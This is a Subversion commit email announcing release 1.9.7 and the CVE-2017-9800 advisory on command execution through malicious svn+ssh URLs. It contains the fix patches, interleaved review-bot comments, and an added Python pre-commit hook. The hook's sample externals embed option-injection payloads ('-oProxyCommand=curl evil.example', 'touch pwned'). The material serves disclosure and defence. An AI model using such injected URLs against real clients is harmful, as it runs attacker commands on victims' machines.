Posted to commits@subversion.apache.org by da...@apache.org on 2017/08/10 18:04:00 UTC
svn commit: r1804690 - in /subversion/site/publish: doap.rdf
docs/release-notes/release-history.html index.html news.html
security/CVE-2017-9800-advisory.txt security/CVE-2017-9800-advisory.txt.asc
security/index.html site-nav.html
Author: danielsh
Date: Thu Aug 10 18:04:00 2017
New Revision: 1804690
URL: http://svn.apache.org/viewvc?rev=1804690&view=rev
Log:
Release Subversion 1.9.7 with a fix for CVE-2017-9800.
Added:
subversion/site/publish/security/CVE-2017-9800-advisory.txt
subversion/site/publish/security/CVE-2017-9800-advisory.txt.asc
Modified:
subversion/site/publish/doap.rdf
subversion/site/publish/docs/release-notes/release-history.html
subversion/site/publish/index.html
subversion/site/publish/news.html
subversion/site/publish/security/index.html
subversion/site/publish/site-nav.html
Modified: subversion/site/publish/doap.rdf
URL: http://svn.apache.org/viewvc/subversion/site/publish/doap.rdf?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/doap.rdf (original)
+++ subversion/site/publish/doap.rdf Thu Aug 10 18:04:00 2017
@@ -37,8 +37,8 @@
<release>
<Version>
<name>Recommended current 1.9 release</name>
- <created>2017-07-06</created>
- <revision>1.9.6</revision>
+ <created>2017-08-10</created>
+ <revision>1.9.7</revision>
</Version>
</release>
<release>
Modified: subversion/site/publish/docs/release-notes/release-history.html
URL: http://svn.apache.org/viewvc/subversion/site/publish/docs/release-notes/release-history.html?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/docs/release-notes/release-history.html (original)
+++ subversion/site/publish/docs/release-notes/release-history.html Thu Aug 10 18:04:00 2017
@@ -31,6 +31,9 @@ Subversion 2.0.</p>
<ul>
<li>
+ <b>Subversion 1.9.7</b> (Thursday, 10 August 2017): Security release.
+ </li>
+ <li>
<b>Subversion 1.8.18</b> (Friday, 07 July 2017): Bugfix release.
</li>
<li>
Modified: subversion/site/publish/index.html
URL: http://svn.apache.org/viewvc/subversion/site/publish/index.html?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/index.html (original)
+++ subversion/site/publish/index.html Thu Aug 10 18:04:00 2017
@@ -64,6 +64,26 @@
<!-- In general, we'll keep only the most recent 3 or 4 news items here. -->
+<div class="h3" id="news-20170810-1">
+<h3>2017-08-09 — Apache Subversion 1.9.7 Released
+ <a class="sectionlink" href="#news-20170810-1"
+ title="Link to this section">¶</a>
+</h3>
+
+<p>We are pleased to announce the release of Apache Subversion 1.9.7.
+ This is the most complete Subversion release to date, and we encourage
+ users of Subversion to upgrade as soon as reasonable.
+ Please see the
+ <a href="https://mail-archives.apache.org/mod_mbox/subversion-announce/201708.mbox/%3C2fefe468-7d41-11e7-aea1-9312c6089150%40apache.org%3E"
+ >release announcement</a> and the
+ <a href="http://svn.apache.org/repos/asf/subversion/tags/1.9.7/CHANGES"
+ >change log</a> for more information about this release.</p>
+
+<p>To get this release from the nearest mirror, please visit our
+ <a href="/download.cgi?update=201708081800#recommended-release">download page</a>.</p>
+
+</div> <!-- #news-20170810-1 -->
+
<div class="h3" id="news-20170726">
<h3>2017-07-26 — Apache Subversion 1.10.0-alpha3 Released
<a class="sectionlink" href="#news-20170726"
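Review bot: the date in the added `<h3>` reads 2017-08-09, but the section id is `news-20170810-1`, doap.rdf in this same commit sets `<created>2017-08-10</created>`, and release-history.html says "Thursday, 10 August 2017"; change the heading to `2017-08-10 — Apache Subversion 1.9.7 Released` so the front page agrees with the rest of the commit. Separately, the 1.9.6 item this hunk displaces told readers what the release fixed, whereas the 1.9.7 text never says it is a security release or links `security/CVE-2017-9800-advisory.txt`; one sentence naming CVE-2017-9800 with a link to the advisory would let users judge the urgency without opening the announcement mail.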
@@ -106,33 +126,6 @@
</div> <!-- #news-20170707 -->
-<div class="h3" id="news-20170706">
-<h3>2017-07-06 — Apache Subversion 1.9.6 Released
- <a class="sectionlink" href="#news-20170706"
- title="Link to this section">¶</a>
-</h3>
-
-<p>We are pleased to announce the release of Apache Subversion 1.9.6.
- This is the most complete Subversion release to date, and we encourage
- users of Subversion to upgrade as soon as reasonable. Please see the
- <a href="https://mail-archives.apache.org/mod_mbox/subversion-announce/201707.mbox/%3C20170706103910.s2fibubji2orhfcs%40tarpaulin.shahaf.local2%3E"
- >release announcement</a> and the
- <a href="http://svn.apache.org/repos/asf/subversion/tags/1.9.6/CHANGES"
- >change log</a> for more information about this release.</p>
-
-<p>This release fixes a bug where a repository would fail to store two files having
- <a href="http://shattered.io/">identical SHA-1 checksums</a>.
- Further information is available
- <a href="/docs/release-notes/1.9#shattered-sha1"
- >in the 1.9.x series release notes</a>
- and in a
- <a href="/faq#shattered-sha1">new FAQ entry</a>.</p>
-
-<p>To get this release from the nearest mirror, please visit our
- <a href="/download.cgi#recommended-release">download page</a>.</p>
-
-</div> <!-- #news-20170706 -->
-
<p style="font-style: italic; text-align:
right;">[Click <a href="/news.html">here</a> to see all News
items.]</p>
Modified: subversion/site/publish/news.html
URL: http://svn.apache.org/viewvc/subversion/site/publish/news.html?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/news.html (original)
+++ subversion/site/publish/news.html Thu Aug 10 18:04:00 2017
@@ -22,6 +22,26 @@
<!-- Maybe we could insert H2's to split up the news items by -->
<!-- calendar year if we felt the need to do so. -->
+<div class="h3" id="news-20170810-1">
+<h3>2017-08-09 — Apache Subversion 1.9.7 Released
+ <a class="sectionlink" href="#news-20170810-1"
+ title="Link to this section">¶</a>
+</h3>
+
+<p>We are pleased to announce the release of Apache Subversion 1.9.7.
+ This is the most complete Subversion release to date, and we encourage
+ users of Subversion to upgrade as soon as reasonable.
+ Please see the
+ <a href="https://mail-archives.apache.org/mod_mbox/subversion-announce/201708.mbox/%3C2fefe468-7d41-11e7-aea1-9312c6089150%40apache.org%3E"
+ >release announcement</a> and the
+ <a href="http://svn.apache.org/repos/asf/subversion/tags/1.9.7/CHANGES"
+ >change log</a> for more information about this release.</p>
+
+<p>To get this release from the nearest mirror, please visit our
+ <a href="/download.cgi?update=201708081800#recommended-release">download page</a>.</p>
+
+</div> <!-- #news-20170810-1 -->
+
<div class="h3" id="news-20170726">
<h3>2017-07-26 — Apache Subversion 1.10.0-alpha3 Released
<a class="sectionlink" href="#news-20170726"
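Review bot: same heading/date mismatch as in index.html: `2017-08-09` on the `+<h3>` line versus the `news-20170810-1` id and the 10 August release date used everywhere else in this commit; fix it to 2017-08-10 here as well, since news.html is the permanent archive and the index.html copy will be pruned later. As with the front page, a pointer to the CVE-2017-9800 advisory in this item would be worth adding.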
Added: subversion/site/publish/security/CVE-2017-9800-advisory.txt
URL: http://svn.apache.org/viewvc/subversion/site/publish/security/CVE-2017-9800-advisory.txt?rev=1804690&view=auto
==============================================================================
--- subversion/site/publish/security/CVE-2017-9800-advisory.txt (added)
+++ subversion/site/publish/security/CVE-2017-9800-advisory.txt Thu Aug 10 18:04:00 2017
@@ -0,0 +1,379 @@
+ Arbitrary code execution on clients through malicious svn+ssh URLs in
+ svn:externals and svn:sync-from-url
+
+Summary:
+========
+
+ A Subversion client sometimes connects to URLs provided by the repository.
+ This happens in two primary cases: during 'checkout', 'export', 'update', and
+ 'switch', when the tree being downloaded contains svn:externals properties;
+ and when using 'svnsync sync' with one URL argument.
+
+ A maliciously constructed svn+ssh:// URL would cause Subversion clients to
+ run an arbitrary shell command. Such a URL could be generated by a malicious
+ server, by a malicious user committing to a honest server (to attack another
+ user of that server's repositories), or by a proxy server.
+
+ The vulnerability affects all clients, including those that use file://,
+ http://, and plain (untunneled) svn://.
+
+ An exploit has been tested.
+
+Known vulnerable:
+=================
+
+ Subversion clients 1.0.0 through 1.8.18 (inclusive)
+ Subversion clients 1.9.0 through 1.9.6 (inclusive)
+ Subversion client 1.10.0-alpha3
+
+ Subversion 1.10.0-alpha1 and 1.10.0-alpha2 are vulnerable,
+ however, were never publicly released.
+
+Known fixed:
+============
+
+ Subversion 1.8.19
+ Subversion 1.9.7
+
+ Patches are available for 1.9, 1.8, 1.6. The patch for 1.9 applies
+ to 1.10.0-alpha3 with an offset. The patch for 1.8 applies to 1.7
+ with an offset.
+
+ Clients that do not have access to an ssh client, and have no custom tunnels
+ configured in their runtime configuration area [1], are not vulnerable.
+
+ Clients using Subversion's own runtime module loading for Repository Access
+ (RA) modules are not vulnerable if the 'libsvn_ra_svn' module, which provides
+ support for the svn+ssh:// and svn:// protocols is removed.
+
+ [1] http://svnbook.red-bean.com/en/1.7/svn.advanced.confarea.html#svn.advanced.confarea.layout
+ This link describes Subversion 1.7, but the description is correct for
+ all other versions as well.
+
+Details:
+========
+
+ (see "Summary:" above)
+
+Severity:
+=========
+
+ CVSSv3 Base Score: 9.9 (Critical)
+ CVSSv3 Base Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C
+
+ A successful exploit will run an arbitrary shell command with the privileges
+ of the Subversion client.
+
+Recommendations:
+================
+
+ Several alternative ways to fix the issue are available. Any one of #1, #2,
+ #3, and #4 fixes the issue completely. There is no need to implement more
+ than one of these four options.
+
+ 1. We recommend all users to upgrade to Subversion 1.9.7 or 1.8.19. New
+ Subversion source and binary packages can be found at:
+ https://subversion.apache.org/download
+ https://subversion.apache.org/packages
+
+ 2. Users of Subversion 1.8.x and 1.9.x who are unable to upgrade may apply
+ the included patch.
+
+ 3. Clients that are not able to execute the 'ssh' command are not vulnerable.
+ Note, however, that the name of the command may be changed by setting the
+ $SVN_SSH environment variable or by setting a value for the 'ssh' key
+ in the "[tunnels]" section of the file "config" in the runtime configuration
+ area [1]. Moreover, the "[tunnels]" section may define additional tunnels;
+ those may be vulnerable if they do not perform input validation on their
+ first argument, which contains the hostname to connect to.
+
+ By default, only the "ssh" tunnel is available. It is available even if it
+ is commented out in the file "config". The default definition of the "ssh"
+ tunnel is equivalent to:
+ ssh = $SVN_SSH ssh -q
+ If that line is not commented out and not set to the default, audit that line
+ as explained below for additional/custom tunnels. If that line is commented
+ out or set to the default, two different fixes are available: either
+ uncomment that line and change the setting to
+ ssh = $SVN_SSH ssh -q --
+ or set the environment variable "SVN_SSH" to the value "ssh -q --".
+
+ Custom tunnels are invoked with three arguments: the hostname to connect to,
+ the string "svnserve" and the string "-t". It is recommended that custom
+ tunnel definitions be audited for correct handling of unusual or invalid
+ host values; the Subversion libraries perform some basic validation,
+ but cannot guarantee correct quoting/escaping of the parameters to
+ arbitrary third-party tunnel commands.
+
+ 4. Clients built to use Subversion's own runtime mechanism for loading
+ modules can remove the libsvn_ra_svn shared module and thus remove the
+ threat. The svn:// and svn+ssh:// protocols will no longer be available.
+ This does not apply to clients built to use the normal compile-time linking
+ of shared libraries: those clients will fail to start if the libsvn_ra_svn
+ shared module is removed. Subversion's own runtime loading mechanism is
+ enabled at build-time by using --enable-runtime-module-search.
+
+ 5. Users of 'svnsync sync' should use the two-URL-arguments form of the
+ command. The current remote URL may be found by either of these two commands:
+ svnsync info -- $DEST_URL
+ svn proplist --verbose --revision=0 -- $DEST_URL
+ where $DEST_URL is the (first, or only) URL argument to 'svnsync sync'.
+ Then, change the svnsync invocation to always pass that URL as an additional
+ argument: change
+ svnsync sync URL/to/sync
+ to
+ svnsync sync URL/to/sync URL/to/source
+ NOTE: This recommendation applies only to 'svnsync sync' and does not fix
+ the 'checkout' / 'update' part of the issue.
+
+ 6. Server administrators may wish to install a 'pre-commit' hook that
+ rejects commits that add invalid svn+*:// URLs, in order to protect their
+ users from other (malicious) users committing such URLs.
+
+ 7. API consumers that implement a 'svn_ra_open_tunnel_func_t open_tunnel_func'
+ callback should audit it for issues similar to this one.
+
+ 8. Subversion 1.7 and 1.6 are officially no longer supported. The
+ patch for 1.8 will apply to 1.7 and a patch for 1.6 is available,
+ the patch for 1.6 could be adapted to even older versions. Since
+ 1.7 and 1.6 are no longer supported there will be no official
+ releases of those branches for this vulnerablity.
+
+ [1] http://svnbook.red-bean.com/en/1.7/svn.advanced.confarea.html#svn.advanced.confarea.layout
+ This link describes Subversion 1.7, but the description is correct for
+ all other versions as well.
+
+References:
+===========
+
+ CVE-2017-9800 (Subversion)
+ CVE-2017-12426 (GitLab)
+ CVE-2017-1000116 (Mercurial (hg))
+ CVE-2017-1000117 (Git)
+
+Reported by:
+============
+
+ Jonathan Nieder
+
+ Discovered by Joern Schneeweisz of Recurity Labs.
+
+Patches:
+========
+
+ Patch for Subversion 1.9.6:
+[[[
+Index: subversion/libsvn_ra_svn/client.c
+===================================================================
+--- subversion/libsvn_ra_svn/client.c (revision 1803926)
++++ subversion/libsvn_ra_svn/client.c (working copy)
+@@ -46,6 +46,7 @@
+ #include "svn_props.h"
+ #include "svn_mergeinfo.h"
+ #include "svn_version.h"
++#include "svn_ctype.h"
+
+ #include "svn_private_config.h"
+
+@@ -396,7 +397,7 @@
+ * versions have it too. If the user is using some other ssh
+ * implementation that doesn't accept it, they can override it
+ * in the [tunnels] section of the config. */
+- val = "$SVN_SSH ssh -q";
++ val = "$SVN_SSH ssh -q --";
+ }
+
+ if (!val || !*val)
+@@ -441,7 +442,7 @@
+ for (n = 0; cmd_argv[n] != NULL; n++)
+ argv[n] = cmd_argv[n];
+
+- argv[n++] = svn_path_uri_decode(hostinfo, pool);
++ argv[n++] = hostinfo;
+ argv[n++] = "svnserve";
+ argv[n++] = "-t";
+ argv[n] = NULL;
+@@ -802,7 +803,33 @@
+ }
+
+
++/* A simple whitelist to ensure the following are valid:
++ * user@server
++ * [::1]:22
++ * server-name
++ * server_name
++ * 127.0.0.1
++ * with an extra restriction that a leading '-' is invalid.
++ */
++static svn_boolean_t
++is_valid_hostinfo(const char *hostinfo)
++{
++ const char *p = hostinfo;
+
++ if (p[0] == '-')
++ return FALSE;
++
++ while (*p)
++ {
++ if (!svn_ctype_isalnum(*p) && !strchr(":.-_[]@", *p))
++ return FALSE;
++
++ ++p;
++ }
++
++ return TRUE;
++}
++
+ static svn_error_t *ra_svn_open(svn_ra_session_t *session,
+ const char **corrected_url,
+ const char *url,
+@@ -835,8 +862,18 @@
+ || (callbacks->check_tunnel_func && callbacks->open_tunnel_func
+ && !callbacks->check_tunnel_func(callbacks->tunnel_baton,
+ tunnel))))
+- SVN_ERR(find_tunnel_agent(tunnel, uri.hostinfo, &tunnel_argv, config,
+- result_pool));
++ {
++ const char *decoded_hostinfo;
++
++ decoded_hostinfo = svn_path_uri_decode(uri.hostinfo, result_pool);
++
++ if (!is_valid_hostinfo(decoded_hostinfo))
++ return svn_error_createf(SVN_ERR_BAD_URL, NULL, _("Invalid host '%s'"),
++ uri.hostinfo);
++
++ SVN_ERR(find_tunnel_agent(tunnel, decoded_hostinfo, &tunnel_argv,
++ config, result_pool));
++ }
+ else
+ tunnel_argv = NULL;
+
+Index: subversion/libsvn_subr/config_file.c
+===================================================================
+--- subversion/libsvn_subr/config_file.c (revision 1803926)
++++ subversion/libsvn_subr/config_file.c (working copy)
+@@ -1248,12 +1248,12 @@
+ "### passed to the tunnel agent as <user>@<hostname>.) If the" NL
+ "### built-in ssh scheme were not predefined, it could be defined" NL
+ "### as:" NL
+- "# ssh = $SVN_SSH ssh -q" NL
++ "# ssh = $SVN_SSH ssh -q --" NL
+ "### If you wanted to define a new 'rsh' scheme, to be used with" NL
+ "### 'svn+rsh:' URLs, you could do so as follows:" NL
+- "# rsh = rsh" NL
++ "# rsh = rsh --" NL
+ "### Or, if you wanted to specify a full path and arguments:" NL
+- "# rsh = /path/to/rsh -l myusername" NL
++ "# rsh = /path/to/rsh -l myusername --" NL
+ "### On Windows, if you are specifying a full path to a command," NL
+ "### use a forward slash (/) or a paired backslash (\\\\) as the" NL
+ "### path separator. A single backslash will be treated as an" NL
+]]]
+
+ Patch for Subversion 1.8.18
+[[[
+Index: subversion/libsvn_ra_svn/client.c
+===================================================================
+--- subversion/libsvn_ra_svn/client.c (revision 1803926)
++++ subversion/libsvn_ra_svn/client.c (working copy)
+@@ -46,6 +46,7 @@
+ #include "svn_props.h"
+ #include "svn_mergeinfo.h"
+ #include "svn_version.h"
++#include "svn_ctype.h"
+
+ #include "svn_private_config.h"
+
+@@ -395,7 +396,7 @@
+ * versions have it too. If the user is using some other ssh
+ * implementation that doesn't accept it, they can override it
+ * in the [tunnels] section of the config. */
+- val = "$SVN_SSH ssh -q";
++ val = "$SVN_SSH ssh -q --";
+ }
+
+ if (!val || !*val)
+@@ -435,7 +436,7 @@
+ ;
+ *argv = apr_palloc(pool, (n + 4) * sizeof(char *));
+ memcpy((void *) *argv, cmd_argv, n * sizeof(char *));
+- (*argv)[n++] = svn_path_uri_decode(hostinfo, pool);
++ (*argv)[n++] = hostinfo;
+ (*argv)[n++] = "svnserve";
+ (*argv)[n++] = "-t";
+ (*argv)[n] = NULL;
+@@ -716,7 +717,33 @@
+ }
+
+
++/* A simple whitelist to ensure the following are valid:
++ * user@server
++ * [::1]:22
++ * server-name
++ * server_name
++ * 127.0.0.1
++ * with an extra restriction that a leading '-' is invalid.
++ */
++static svn_boolean_t
++is_valid_hostinfo(const char *hostinfo)
++{
++ const char *p = hostinfo;
+
++ if (p[0] == '-')
++ return FALSE;
++
++ while (*p)
++ {
++ if (!svn_ctype_isalnum(*p) && !strchr(":.-_[]@", *p))
++ return FALSE;
++
++ ++p;
++ }
++
++ return TRUE;
++}
++
+ static svn_error_t *ra_svn_open(svn_ra_session_t *session,
+ const char **corrected_url,
+ const char *url,
+@@ -740,8 +767,17 @@
+ parse_tunnel(url, &tunnel, pool);
+
+ if (tunnel)
+- SVN_ERR(find_tunnel_agent(tunnel, uri.hostinfo, &tunnel_argv, config,
+- pool));
++ {
++ const char *decoded_hostinfo;
++
++ decoded_hostinfo = svn_path_uri_decode(uri.hostinfo, pool);
++ if (!is_valid_hostinfo(decoded_hostinfo))
++ return svn_error_createf(SVN_ERR_BAD_URL, NULL, _("Invalid host '%s'"),
++ uri.hostinfo);
++
++ SVN_ERR(find_tunnel_agent(tunnel, decoded_hostinfo, &tunnel_argv,
++ config, pool));
++ }
+ else
+ tunnel_argv = NULL;
+
+Index: subversion/libsvn_subr/config_file.c
+===================================================================
+--- subversion/libsvn_subr/config_file.c (revision 1803926)
++++ subversion/libsvn_subr/config_file.c (working copy)
+@@ -1134,12 +1134,12 @@
+ "### passed to the tunnel agent as <user>@<hostname>.) If the" NL
+ "### built-in ssh scheme were not predefined, it could be defined" NL
+ "### as:" NL
+- "# ssh = $SVN_SSH ssh -q" NL
++ "# ssh = $SVN_SSH ssh -q --" NL
+ "### If you wanted to define a new 'rsh' scheme, to be used with" NL
+ "### 'svn+rsh:' URLs, you could do so as follows:" NL
+- "# rsh = rsh" NL
++ "# rsh = rsh --" NL
+ "### Or, if you wanted to specify a full path and arguments:" NL
+- "# rsh = /path/to/rsh -l myusername" NL
++ "# rsh = /path/to/rsh -l myusername --" NL
+ "### On Windows, if you are specifying a full path to a command," NL
+ "### use a forward slash (/) or a paired backslash (\\\\) as the" NL
+ "### path separator. A single backslash will be treated as an" NL
+]]]
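Review bot: "Known fixed" and recommendation #8 both say a patch for 1.6 is available, but the "Patches:" section ships only the 1.9.6 and 1.8.18 patches; either include the 1.6 patch or give a URL for it, otherwise 1.6/1.7 users are told a fix exists without being shown where. Two smaller points in the text: the line labelled "CVSSv3 Base Vector" also carries the temporal metrics `E:H/RL:O/RC:C`, which do not belong to the base score of 9.9, so either drop them or label the vector as base plus temporal; and "vulnerablity" in recommendation #8 is misspelled. On the code, `is_valid_hostinfo` relies on the `while (*p)` guard to keep `strchr(":.-_[]@", *p)` from matching the string's own terminator when `*p` is `'\0'`; a one-line comment on the `strchr` call would stop a later refactor from turning the loop into one that tests the terminator.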
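As an added illustration of recommendation #6 above (this is not code from the Subversion project or from the advisory), here is a server-side pre-commit hook in Python that reuses the hostinfo whitelist from the patch to refuse commits whose svn:externals name an svn+<tunnel>:// URL with a host part the fixed client would reject. Everything deployment-specific is an assumption rather than something the advisory states: the hook is run by Subversion as `pre-commit REPOS TXN`, `svnlook` is on PATH, and `svnlook changed` prints two status columns, two spaces, then the path. The sample svn:externals value embedded in the block is constructed for the example. The hook goes slightly beyond the text in two ways: it also validates scheme-relative `//host/path` externals, which take their scheme from the repository that holds the property, and it percent-decodes the host part before checking it, as the patched client does, so `%2D` cannot hide a leading `-`.

```python
"""pre-commit hook: reject svn:externals that point at svn+<tunnel>:// URLs
whose host part the CVE-2017-9800 fix would refuse.

Invoked by Subversion as:  pre-commit REPOS-PATH TXN-NAME
Assumes `svnlook` is on PATH (a deployment assumption, not from the advisory).
"""
import re
import subprocess
import sys
from urllib.parse import unquote

# Same whitelist as is_valid_hostinfo() in the 1.9.7 patch: ASCII alphanumerics
# plus ":.-_[]@", and a leading '-' is refused so the host can never be an option.
_HOSTINFO_OK = re.compile(r'[A-Za-z0-9:.\-_\[\]@]*')


def is_valid_hostinfo(hostinfo: str) -> bool:
    """True if HOSTINFO is safe to hand to a tunnel command as its first argument."""
    if hostinfo.startswith('-'):
        return False
    return _HOSTINFO_OK.fullmatch(hostinfo) is not None


def tunnel_hostinfo(token: str):
    """Percent-decoded host part of an svn+<tunnel>:// URL, or None if TOKEN is
    not a tunnel URL.  Scheme-relative externals ('//host/path') are treated as
    tunnel URLs too, because they inherit the scheme of the repository that
    carries the property (a conservative choice made for this hook)."""
    if token.startswith('//'):
        rest = token[2:]
    else:
        scheme, sep, rest = token.partition('://')
        if not sep or not scheme.lower().startswith('svn+'):
            return None
    # The patched client decodes the hostinfo before validating it; do the same
    # so '%2D' cannot smuggle a leading '-' past the check.
    return unquote(rest.split('/', 1)[0])


def find_bad_externals(propval: str):
    """Return (line, hostinfo) for every svn:externals line naming a tunnel URL
    whose host part fails the whitelist.  Every whitespace-separated token is
    tried, so both the 'URL path' and the legacy 'path URL' layouts are covered."""
    bad = []
    for line in propval.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        for token in line.split():
            hostinfo = tunnel_hostinfo(token)
            if hostinfo is not None and not is_valid_hostinfo(hostinfo):
                bad.append((line, hostinfo))
    return bad


# Constructed sample property value (not taken from the advisory): one honest
# external, one percent-encoded attempt to hide the leading '-', one
# scheme-relative one, and an http:// URL that the tunnel check must ignore.
SAMPLE_EXTERNALS = """\
# third-party code
svn+ssh://build@svn.example.org/repos/lib lib
-r 42 svn+ssh://%2DoProxyCommand=touch%20pwned/repo tools
//-oProxyCommand=curl%20evil.example/repo/trunk shared
http://-not-a-tunnel/repo docs
"""


def check_transaction(repo: str, txn: str):
    """Run svnlook over the transaction and return the list of problems found.
    Assumed `svnlook changed` layout: content status, property status, two
    spaces, path; 'A' = added path, 'U' in the second column = property change."""
    problems = []
    changed = subprocess.run(['svnlook', 'changed', '-t', txn, repo],
                             check=True, capture_output=True, text=True).stdout
    for entry in changed.splitlines():
        if len(entry) < 5:
            continue
        status, path = entry[:2], entry[4:]
        if status[0] != 'A' and status[1] != 'U':
            continue
        res = subprocess.run(['svnlook', 'propget', '-t', txn, repo,
                              'svn:externals', path],
                             capture_output=True, text=True)
        if res.returncode != 0:          # no svn:externals on this path
            continue
        for line, hostinfo in find_bad_externals(res.stdout):
            problems.append("%s: rejected tunnel host %r in external %r"
                            % (path, hostinfo, line))
    return problems


if __name__ == '__main__':
    found = check_transaction(sys.argv[1], sys.argv[2])
    if found:
        sys.stderr.write('CVE-2017-9800 guard rejected this commit:\n  '
                         + '\n  '.join(found) + '\n')
        sys.exit(1)
```

The hook inspects only svn:externals in the committed tree, which is what recommendation #6 targets; it does nothing for the svnsync side of the issue, where recommendation #5 (the two-URL form of 'svnsync sync') still applies. Because it works on the transaction via `svnlook -t`, a rejected commit never becomes a revision, so other users of the repository are never exposed to the URL.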
Added: subversion/site/publish/security/CVE-2017-9800-advisory.txt.asc
URL: http://svn.apache.org/viewvc/subversion/site/publish/security/CVE-2017-9800-advisory.txt.asc?rev=1804690&view=auto
==============================================================================
--- subversion/site/publish/security/CVE-2017-9800-advisory.txt.asc (added)
+++ subversion/site/publish/security/CVE-2017-9800-advisory.txt.asc Thu Aug 10 18:04:00 2017
@@ -0,0 +1,16 @@
+-----BEGIN PGP SIGNATURE-----
+
+iQIrBAABCAAdFiEEbrYLY3zlrL8kSaLa2yfpl0Ka8gwFAlmLcx0ACgkQ2yfpl0Ka
+8gy+lA+6A5G8S1NPrlWhu6Y3DpKimx7Wk7gF9XvRRJLqNTFP9ZqN+3M9ucRYWQK1
+6y0xscHKtdSiTiqEDzvNKAAkcHm+ZemU0YDt7OyR2SYORgJfUlmWPaM7G26eTWj/
+3pX02JubRK+ggY9p302/QvKJnWvssdg4r4VQGIpSYwmM59glBrHVgbrcNtpggc4V
+4irxuTmmidjFLSHdggJHYWPIoYlp3glYOAddDyRCIDtb7yigf1p/rNHFD8IGw9lH
+CiN+gcgl+wDSxgQWKKJTjQwnocGl2EmpSqu3Gxz3R+STWiCeaVwyAUGS7z/26CKP
+8gE+ZW51nQx9tDvfQaKMOz1/Zm+EJ0FFJH0ZRKCD+FHpszR6Po+qMSZM/TMaOmc2
+/ugoDf1sGp/tvVHx2lwwlfwKsWDW21lCUDegB8nFcVB9PTPnZ4VlOBP91pggKop3
+k5epgWqf2+mVv9cW8T5HSwqvh0J1hzOfa5d2Ez6UGbtg3oJi0pBrPLbZEXgYgEdM
+wPQ0QrjPmIxV1OxuJjJ2ZR3ot/Vxbh40dD1toVLUIek4BKZXj4d99h7C68x82EwD
+CdhYQ6eJl4IfQHc7U+r/nIvga9Mu9X9LFdL2Cx4WBS/iKBDhYPtbqhtEww8ibFir
+Ox0RrSIK0cYlbq07f3whmuQ55O2eYUGhZh+oKtoT
+=GRyz
+-----END PGP SIGNATURE-----
Modified: subversion/site/publish/security/index.html
URL: http://svn.apache.org/viewvc/subversion/site/publish/security/index.html?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/security/index.html (original)
+++ subversion/site/publish/security/index.html Thu Aug 10 18:04:00 2017
@@ -274,6 +274,15 @@ clients using http(s)://</td>
<td>1.1.0-1.8.17 and 1.9.0-1.9.5</td>
<td>Apache Subversion is unable to store SHA1 collisions.</td>
</tr>
+
+<tr>
+<td><a href="CVE-2017-9800-advisory.txt">CVE-2017-9800-advisory.txt</a>
+[<a href="CVE-2017-9800-advisory.txt.asc">PGP</a>]</td>
+<td>1.0.0-1.8.18 and 1.9.0-1.9.6 and 1.10.0-alpha1-1.10.0-alpha3</td>
+<td>Arbitrary code execution on clients through malicious svn+ssh URLs in
+ svn:externals and svn:sync-from-url</td>
+</tr>
+
</tbody>
</table>
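Review bot: in the new affected-versions cell, `1.10.0-alpha1-1.10.0-alpha3` uses the hyphen both as the range separator and inside the version strings, which is hard to scan next to the `1.0.0-1.8.18` ranges; spell that part out as `1.10.0-alpha1 through 1.10.0-alpha3` (or wrap each version in `<code>`) so the three ranges read unambiguously.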
Modified: subversion/site/publish/site-nav.html
URL: http://svn.apache.org/viewvc/subversion/site/publish/site-nav.html?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/site-nav.html (original)
+++ subversion/site/publish/site-nav.html Thu Aug 10 18:04:00 2017
@@ -14,7 +14,7 @@
</li>
<li>Getting Subversion
<ul>
- <li><a href="/download.cgi">Source Download</a></li>
+ <li><a href="/download.cgi?update=201708081800">Source Download</a></li>
<li><a href="/packages.html">Binary Packages</a></li>
<li><a href="/docs/release-notes/">Release Notes</a></li>
</ul>